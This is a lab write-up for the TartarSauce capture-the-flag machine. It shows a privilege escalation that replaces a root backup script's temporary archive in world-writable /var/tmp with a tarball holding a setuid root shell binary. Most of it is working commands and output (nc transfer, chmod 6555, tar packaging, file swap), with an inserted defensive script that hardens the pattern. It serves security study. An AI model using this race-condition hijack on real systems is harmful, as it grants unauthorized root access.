File Hijacking


During the post-enumeration phase, I discovered a systemd job running every 5 minutes that calls /usr/sbin/backuperer, which is a bash script that runs a set of commands. It was also discovered manually by going through the home directory of the onuma user.

I will be diving into an in-depth analysis of the bash script below. /usr/sbin/backuperer is a bash script that:

• Creates a backup file of /var/www/html and gives it 30 seconds to complete
• Stores it temporarily at /var/tmp as $tmpfile, which is a random string
• Creates a variable directory, $check, under /var/tmp
• Extracts $tmpfile to the $check directory
• Runs a function, integrity_chk(), that checks for differences between the base directory ($basedir) and the newly created directory /var/tmp/check/$basedir from the extraction above
  - If integrity_chk() returns nothing, moves $tmpfile to the backup directory as onuma-www-dev.back
  - If integrity_chk() returns anything, prints out the error message variable

Now looking at it in depth, I believe there is a way to escalate privileges: by hijacking the content of $tmpfile while it is stored in /var/tmp, a directory that is writable by anyone.
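The defensive counterpart to the pattern analysed above, as an added example that is not part of the original write-up and not the backuperer script itself: a backup-then-verify routine that keeps its temporary archive out of any world-writable directory, audits the archive's member list for setuid/setgid bits and path traversal before a privileged extraction, and extracts without honouring stored ownership or permission bits. It assumes a POSIX shell with a GNU-style tar (-tvf listing format, --no-same-owner, --no-same-permissions); the function names, the sample tree and the fixture archives are constructed for this example.

```shell
#!/bin/sh
# Added example, not the TartarSauce backuperer script: a hardened form of the
# backup-then-verify pattern described above. Function names, the sample tree
# and the fixture archives are constructed for this example; the tar options
# used (-tvf, -C, --no-same-owner, --no-same-permissions) are standard.
set -eu

# Audit an archive before a privileged process extracts it. Returns 0 only if
# the listing succeeds and no member has an absolute path, a ".." component,
# or a setuid/setgid bit. `tar -tvf` prints the mode string recorded in the
# archive header, so an entry such as "-r-sr-sr-x" is caught before anything
# is written to disk. Parsing assumes member names without whitespace.
archive_is_safe() {
    archive=$1
    listing=$(mktemp)
    # A listing failure (corrupt or truncated archive) is treated as unsafe.
    if ! tar -tvf "$archive" > "$listing" 2>/dev/null; then
        rm -f "$listing"
        return 1
    fi
    status=0
    awk '
        { mode = $1; path = $NF }
        path ~ /^\// { bad = 1 }                                   # absolute path
        path == ".." || path ~ /^\.\.\// || path ~ /\/\.\.\// || path ~ /\/\.\.$/ { bad = 1 }
        substr(mode, 4, 1) ~ /[sS]/ { bad = 1 }                    # setuid
        substr(mode, 7, 1) ~ /[sS]/ { bad = 1 }                    # setgid
        END { exit bad ? 1 : 0 }
    ' "$listing" || status=1
    rm -f "$listing"
    return $status
}

# Hardened backup. Unlike the script above, the archive and the verification
# tree never exist in a world-writable directory: mktemp -d creates the working
# directory with mode 0700 under a private base directory (on a real host a
# root-owned path such as /var/backups, never /var/tmp), so no other user can
# swap the archive in the window between creation and extraction.
#   $1 source directory, $2 destination archive path, $3 private base directory
safe_backup() {
    src=$1
    dest=$2
    base=$3
    work=$(mktemp -d "$base/backup.XXXXXX")
    archive=$work/backup.tar.gz
    check=$work/check

    tar -czf "$archive" -C "$(dirname "$src")" "$(basename "$src")"

    # Audit before unpacking with privileges.
    if ! archive_is_safe "$archive"; then
        rm -rf "$work"
        echo "backup aborted: archive contains unsafe members" >&2
        return 1
    fi

    # Even a clean archive is unpacked without honouring stored ownership or
    # setuid/setgid bits, so nothing in the check tree can become a root-owned
    # privileged binary.
    mkdir "$check"
    tar -xzf "$archive" -C "$check" --no-same-owner --no-same-permissions

    # Integrity check as in the write-up: the extracted tree must match the source.
    if diff -r "$src" "$check/$(basename "$src")" > /dev/null; then
        mv "$archive" "$dest"
        rm -rf "$work"
        return 0
    fi
    rm -rf "$work"
    echo "backup aborted: integrity check failed" >&2
    return 1
}

# Constructed fixtures: one archive holding an ordinary file and one whose
# member carries a setuid bit (setting setuid on a file you own needs no
# privilege, so this runs as an unprivileged user).
make_fixture_archives() {
    dir=$1
    mkdir -p "$dir/clean/www" "$dir/suid/www"
    echo "index" > "$dir/clean/www/index.html"
    echo "index" > "$dir/suid/www/index.html"
    chmod 4755 "$dir/suid/www/index.html"
    tar -czf "$dir/clean.tar.gz" -C "$dir/clean" www
    tar -czf "$dir/suid.tar.gz" -C "$dir/suid" www
}

# Stand-alone demonstration.
demo_dir=$(mktemp -d)
make_fixture_archives "$demo_dir"
for a in clean suid; do
    if archive_is_safe "$demo_dir/$a.tar.gz"; then
        echo "$a.tar.gz: safe to extract"
    else
        echo "$a.tar.gz: REJECTED"
    fi
done
safe_backup "$demo_dir/clean/www" "$demo_dir/www-backup.tar.gz" "$demo_dir" \
    && echo "backup written to $demo_dir/www-backup.tar.gz"
rm -rf "$demo_dir"
```

The two controls address the two halves of the weakness described in the write-up: the private 0700 working directory removes the window in which another user can overwrite $tmpfile, and the pre-extraction audit plus --no-same-permissions means that even if a tampered archive did get through, a setuid binary would never be created under the check directory.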

First Attempt


┌──(kali㉿kali)-[~/archive/htb/labs/tartarsauce]
└─$ sudo mkdir -p var/www/html ; sudo cp ToRoot var/www/html/

I will create a directory, var/www/html, to mimic the $basedir variable in backuperer. I will also place the payload in it.

┌──(kali㉿kali)-[~/archive/htb/labs/tartarsauce]
└─$ sudo chmod 6555 var/www/html/ToRoot                      
 
┌──(kali㉿kali)-[~/archive/htb/labs/tartarsauce]
└─$ ll var/www/html/ToRoot
16K -r-sr-sr-x 1 root root 15K Oct 24 19:05 var/www/html/ToRoot

I then turn the binary into a SUID binary by setting its permission bits to 6555. This is for assurance.

┌──(kali㉿kali)-[~/archive/htb/labs/tartarsauce]
└─$ sudo tar -zcvf hijacker.tar.gz var/
var/
var/www/
var/www/html/
var/www/html/ToRoot

The directory then needs to be archived. I named it hijacker.tar.gz.

┌──(kali㉿kali)-[~/archive/htb/labs/tartarsauce]
└─$ nc $IP 2222 < hijacker.tar.gz
 
onuma@TartarSauce:/var/tmp$ nc -nlvp 2222 > hijacker.tar.gz
Listening on [0.0.0.0] (family 0, port 2222)
Connection from [10.10.14.10] port 2222 [tcp/*] accepted (family 2, sport 45986)

The archive is then transferred to the /var/tmp directory on the target.

onuma@TartarSauce:/var/tmp$ ls -la
total 44
drwxrwxrwt 10 root  root  4096 Jan 23 09:34 .
drwxr-xr-x 14 root  root  4096 May 12  2022 ..
-rw-r--r--  1 onuma onuma 2636 Jan 23 09:34 hijacker.tar.gz

I can confirm that the archive is now present at /var/tmp/hijacker.tar.gz on the target system.

onuma@TartarSauce:/var/tmp$ systemctl list-timers --all
NEXT                         LEFT          LAST                         PASSED  
Mon 2023-01-23 09:40:53 EST  1min 54s left Mon 2023-01-23 09:35:53 EST  3min 5s 
Mon 2023-01-23 20:07:17 EST  10h left      Mon 2023-01-23 06:39:26 EST  2h 59min
Tue 2023-01-24 06:05:22 EST  20h left      Mon 2023-01-23 06:39:26 EST  2h 59min
Tue 2023-01-24 06:54:31 EST  21h left      Mon 2023-01-23 06:54:31 EST  2h 44min
n/a                          n/a           n/a                          n/a     
n/a                          n/a           n/a                          n/a     
n/a                          n/a           n/a                          n/a     
 
7 timers listed.

I have less than 2 minutes left until the next backuperer run.

onuma@TartarSauce:/var/tmp$ systemctl list-timers --all
NEXT                         LEFT     LAST                         PASSED       
Mon 2023-01-23 09:40:53 EST  5s ago   Mon 2023-01-23 09:40:57 EST  2s ago       

It says it already executed 2 seconds ago. It should have created the $tmpfile file with a random string as its name.

onuma@TartarSauce:/var/tmp$ ll
total 9116
drwxrwxrwt 10 root  root     4096 Jan 23 09:40 ./
drwxr-xr-x 14 root  root     4096 May 12  2022 ../
-rw-r--r--  1 onuma onuma 9289728 Jan 23 09:41 .1af5ba1a8041b868e61186abbe147931abfaf523
-rw-r--r--  1 onuma onuma    2636 Jan 23 09:34 hijacker.tar.gz

I can see it right there. .1af5ba1a8041b868e61186abbe147931abfaf523 is the $tmpfile file, and it is 9289728 bytes in size.

Time for hijacking

onuma@TartarSauce:/var/tmp$ cp hijacker.tar.gz .1af5ba1a8041b868e61186abbe147931abfaf523
onuma@TartarSauce:/var/tmp$ ll
total 48
drwxrwxrwt 10 root  root  4096 Jan 23 09:40 ./
drwxr-xr-x 14 root  root  4096 May 12  2022 ../
-rw-r--r--  1 onuma onuma 2636 Jan 23 09:41 .1af5ba1a8041b868e61186abbe147931abfaf523
-rw-r--r--  1 onuma onuma 2636 Jan 23 09:34 hijacker.tar.gz

I copied the content of the hijacker.tar.gz file into the $tmpfile file, .1af5ba1a8041b868e61186abbe147931abfaf523. As shown, they both now have the same byte size, implying that the copy was successful.

onuma@TartarSauce:/var/tmp$ ll
total 52
drwxrwxrwt 11 root  root  4096 Jan 23 09:41 ./
drwxr-xr-x 14 root  root  4096 May 12  2022 ../
-rw-r--r--  1 onuma onuma 2636 Jan 23 09:41 .1af5ba1a8041b868e61186abbe147931abfaf523
drwxr-xr-x  3 root  root  4096 Jan 23 09:41 check/
-rw-r--r--  1 onuma onuma 2636 Jan 23 09:34 hijacker.tar.gz

A moment later, backuperer extracted $tmpfile to the newly created $check directory. That check/ directory should now contain my payload, ToRoot (a shell spawner), since I replaced the content of $tmpfile with hijacker.tar.gz above. This whole operation was done with the privileges of the root user, so the payload should now be owned by root.

onuma@TartarSauce:/var/tmp/check/var/www/html$ ./ToRoot
./ToRoot: /lib/i386-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./ToRoot)

Attempting to spawn a shell results in failure. The error message shows that glibc 2.34 is not found on the system. This is quite obvious, because the payload was compiled in Kali against a different version of glibc.

I even enumerated the version of glibc on the target system earlier. It is glibc 2.23. I should have paid more attention.

But that is okay; I can redo all of this with a correctly compiled binary.

Second Attempt


The binary is compiled in a Docker container that has the same glibc version as the target and delivered back to Kali for preparation.

┌──(kali㉿kali)-[~/archive/htb/labs/tartarsauce]
└─$ sudo cp ToRoot var/www/html ; sudo chmod 6555 var/www/html/ToRoot
┌──(kali㉿kali)-[~/archive/htb/labs/tartarsauce]
└─$ ll var/www/html                                          
total 16K
4.0K drwxr-xr-x 2 root root 4.0K Oct 24 22:51 .
8.0K -r-sr-sr-x 1 root root 7.3K Oct 24 22:51 ToRoot
4.0K drwxr-xr-x 3 root root 4.0K Oct 24 19:05 ..

Place the binary in the var/www/html directory and turn it into a SUID binary by setting its permission bits to 6555.

┌──(kali㉿kali)-[~/archive/htb/labs/tartarsauce]
└─$ sudo tar -czvf hijacker.tar.gz var/
var/
var/www/
var/www/html/
var/www/html/ToRoot

Package it up with tar as hijacker.tar.gz.

┌──(kali㉿kali)-[~/archive/htb/labs/tartarsauce]
└─$ nc 10.10.10.88 1234 < hijacker.tar.gz
 
onuma@TartarSauce:/var/tmp$ nc -nvlp 1234 > hijacker.tar.gz
Listening on [0.0.0.0] (family 0, port 1234)
Connection from [10.10.14.10] port 1234 [tcp/*] accepted (family 2, sport 53934)

I will then deliver the archive to the target system and put it in the /var/tmp directory like before.

onuma@TartarSauce:/var/tmp$ systemctl list-timers --all
NEXT                         LEFT     LAST                         PASSED       
Mon 2023-01-23 09:58:53 EST  19s left Mon 2023-01-23 09:53:53 EST  4min 40s ago 

19 seconds are left until the next backuperer run.

onuma@TartarSauce:/var/tmp$ ll
total 11288
drwxrwxrwt 10 root  root      4096 Jan 23 10:11 ./
drwxr-xr-x 14 root  root      4096 May 12  2022 ../
-rw-r--r--  1 onuma onuma 11511296 Jan 23 10:11 .4c30959c869b566c6e05c71b757101a2abd94f20
-rw-r--r--  1 onuma onuma     2636 Jan 23 09:34 hijacker.tar.gz
 

The $tmpfile file shows up again! Time to hijack it!

onuma@TartarSauce:/var/tmp$ cp hijacker.tar.gz .4c30959c869b566c6e05c71b757101a2abd94f20

Replacing .4c30959c869b566c6e05c71b757101a2abd94f20 with the content of the hijacker.tar.gz file.

onuma@TartarSauce:/var/tmp$ ll
total 52
drwxrwxrwt 11 root  root  4096 Jan 23 10:11 ./
drwxr-xr-x 14 root  root  4096 May 12  2022 ../
-rw-r--r--  1 onuma onuma 2636 Jan 23 10:11 .4c30959c869b566c6e05c71b757101a2abd94f20
drwxr-xr-x  3 root  root  4096 Jan 23 10:11 check/
-rw-r--r--  1 onuma onuma 2636 Jan 23 09:34 hijacker.tar.gz

30 seconds must have passed. The $check directory now shows up, containing the extracted $tmpfile, whose content had been replaced with my archive.

onuma@TartarSauce:/var/tmp/check/var/www/html$ ls
ToRoot

And at last, ToRoot is here.

onuma@TartarSauce:/var/tmp/check/var/www/html$ ./ToRoot
# whoami
whoami
root
# hostname
hostname
TartarSauce
# ifconfig
ifconfig
ens192    Link encap:Ethernet  HWaddr 00:50:56:b9:55:4f  
          inet addr:10.10.10.88  Bcast:10.10.10.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1295509 errors:0 dropped:76 overruns:0 frame:0
          TX packets:1289042 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:280030720 (280.0 MB)  TX bytes:608490772 (608.4 MB)
 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:35192 errors:0 dropped:0 overruns:0 frame:0
          TX packets:35192 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:2610848 (2.6 MB)  TX bytes:2610848 (2.6 MB)

System Level Compromise